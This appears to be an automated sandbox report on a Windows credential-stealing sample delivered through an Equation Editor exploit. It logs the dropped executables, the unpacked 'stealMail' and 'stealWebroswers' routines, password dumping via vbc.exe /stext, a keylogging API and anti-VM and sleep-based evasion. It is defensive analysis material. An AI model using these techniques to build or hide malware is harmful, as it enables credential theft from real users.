Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\name.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp, vbc.exe
Source:	Binary string: InstallUtil.pdb source: name.exe, 00000004.00000003.2131621368.00000000060F7000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.4.dr

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,

Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_002B42E9 push 4D0F4CDFh; ret
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_002B42F8 push 4D0F4CDFh; ret
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_002B42F8 push 4D164CD4h; ret
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_002B4358 push 4D164CD4h; ret
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00A04E9A push es; iretd
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00A00A2A push ds; ret
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00A005E6 pushfd ; iretd
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00A04B71 push es; iretd
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_00428BB2 push ecx; ret
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F83515 push eax; ret
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F80344 push ecx; iretd
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F886FE push eax; retn 0023h
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F84224 push ebx; retf
Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4_2_01F8421A push ebx; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00411879 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004118A0 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_004118A0 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00442871 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00442A90 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00442A90 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00446E54 push eax; ret

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UPDATED-08102021.PDF[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\name.exe	File created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\name.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)

Show sources

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Roaming\name.exe

File opened: C:\Users\user\AppData\Roaming\name.exe\:Zone.Identifier read attributes | delete

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\AppData\Roaming\name.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\name.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: Process Memory Space: name.exe PID: 1708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 752, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

Source: C:\Users\user\AppData\Roaming\name.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Roaming\name.exe	Window / User API: threadDelayed 395
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Window / User API: threadDelayed 435

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3056	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\name.exe TID: 2756	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\name.exe TID: 3016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\name.exe TID: 3012	Thread sleep count: 395 > 30
Source: C:\Users\user\AppData\Roaming\name.exe TID: 3016	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 948	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2192	Thread sleep time: -87000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2184	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2188	Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1320	Thread sleep time: -180000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_004161B0 memset,GetSystemInfo,

Source: C:\Users\user\AppData\Roaming\name.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\name.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 140000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 180000

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmware vmci bus device!vmware virtual s scsi disk device
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmware svga
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vboxservice
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-Vmicrosoft
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmware usb pointing device
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmware pointing device
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmware sata
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmware virtual s scsi disk device
Source: name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	Binary or memory string: vmware vmci bus device

Source: C:\Users\user\AppData\Roaming\name.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,

Source: C:\Users\user\AppData\Roaming\name.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\name.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
